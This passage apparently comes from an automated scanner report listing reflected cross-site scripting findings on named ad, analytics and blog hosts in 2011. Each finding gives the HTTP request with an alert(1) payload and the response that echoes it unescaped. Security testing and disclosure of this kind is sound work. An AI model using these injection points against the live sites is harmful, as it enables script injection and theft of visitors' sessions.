Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:00:30 GMT
Date: Tue, 06 Sep 2011 15:00:30 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2b7be8<script>alert(1)</script>8499cdf77af", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b8f5c<script>alert(1)</script>26c563a3d19 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=b8f5c<script>alert(1)</script>26c563a3d19&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"b8f5c<script>alert(1)</script>26c563a3d19", c15:"", c16:"", r:""});



3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3f055<script>alert(1)</script>215fffaf43b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15=3f055<script>alert(1)</script>215fffaf43b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
RE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"3f055<script>alert(1)</script>215fffaf43b", c16:"", r:""});



3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 302ec<script>alert(1)</script>901d717b8ca was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693302ec<script>alert(1)</script>901d717b8ca&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693302ec<script>alert(1)</script>901d717b8ca", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d7c1e<script>alert(1)</script>9d9537f6b13 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1d7c1e<script>alert(1)</script>9d9537f6b13&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:51 GMT
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1d7c1e<script>alert(1)</script>9d9537f6b13", c4:"http://www.readwriteweb.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 41993<script>alert(1)</script>fc7d8b09653 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F41993<script>alert(1)</script>fc7d8b09653&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/41993<script>alert(1)</script>fc7d8b09653", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 56553<script>alert(1)</script>e3dfef08947 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=56553<script>alert(1)</script>e3dfef08947&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:52 GMT
Date: Tue, 06 Sep 2011 15:32:52 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"56553<script>alert(1)</script>e3dfef08947", c6:"", c10:"", c15:"", c16:"", r:""});



3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload d95cf<script>alert(1)</script>677d9af4a8c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.readwriteweb.com%2F&c5=&c6=d95cf<script>alert(1)</script>677d9af4a8c&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 20 Sep 2011 15:32:53 GMT
Date: Tue, 06 Sep 2011 15:32:53 GMT
Content-Length: 1263
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.readwriteweb.com/", c5:"", c6:"d95cf<script>alert(1)</script>677d9af4a8c", c10:"", c15:"", c16:"", r:""});



3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23d3a"><script>alert(1)</script>32285faa682 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23d3a\"><script>alert(1)</script>32285faa682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dm/index.php/23d3a"><script>alert(1)</script>32285faa682 HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://blog.harbottle.com/dm/xmlrpc.php
Status: 200 OK
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>Digital Media Law</title>
<base href="http://blog.harbottle.com/dm/">
...[SNIP]...
<a href="http://blog.harbottle.com/dm/index.php/23d3a\"><script>alert(1)</script>32285faa682?paged=2">
...[SNIP]...

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.ulf-wendel.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b78"><script>alert(1)</script>06485f2279d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45b78\"><script>alert(1)</script>06485f2279d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?45b78"><script>alert(1)</script>06485f2279d=1 HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:38 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://blog.ulf-wendel.de/?45b78\"><script>alert(1)</script>06485f2279d=1&amp;paged=2">
...[SNIP]...

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload d2555<script>alert(1)</script>79d6c0d4362 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 532
Origin: http://blogs.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qa39efb8859c99888a16c5b96b94383131a9ffbbe
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:02 GMT
Server:
Content-Length: 3570

......../1/onResult......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAFcSbzI~,OkyYKKfkn3za9MF0qI3Ufg1AerdkqfR3.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bjz... ..ivideoPlayerd2555<script>alert(1)</script>79d6c0d4362..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.26. http://cdn.krxd.net/config/ [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload b16f3<script>alert(1)</script>76bb110beda was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=cnbc.comb16f3<script>alert(1)</script>76bb110beda&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=10601 t=1315321012024997
X-Served-By: logger-b011.krxd.net
Content-Length: 91
Date: Tue, 06 Sep 2011 14:56:52 GMT
Connection: close

{"error": "Non existant site for NBCU - cnbc.comb16f3<script>alert(1)</script>76bb110beda"}

3.27. http://content.plymedia.com/initialize [video parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /initialize

Issue detail

The value of the video request parameter is copied into an XML comment. The payload cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 was submitted in the video parameter. This input was echoed as cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /initialize?video=cafa3--><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>94f14959222 HTTP/1.1
Host: content.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s1bwwjcc2333zalrmiy15feu

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:15:32 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:32 GMT
Content-Length: 599
Connection: keep-alive

<!--9/6/2011 4:14:32 PM [Cached For:60, From: http://services.plymedia.com/initialize?video=cafa3--><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>94f14959222]--><!--9/6/2011
...[SNIP]...

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbdf7'-alert(1)-'8a1211d7b4b was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=416
Expires: Tue, 06 Sep 2011 15:22:56 GMT
Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=cbdf7'-alert(1)-'8a1211d7b4b">
...[SNIP]...

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v11-001/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aa06'-alert(1)-'af6ec576df9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

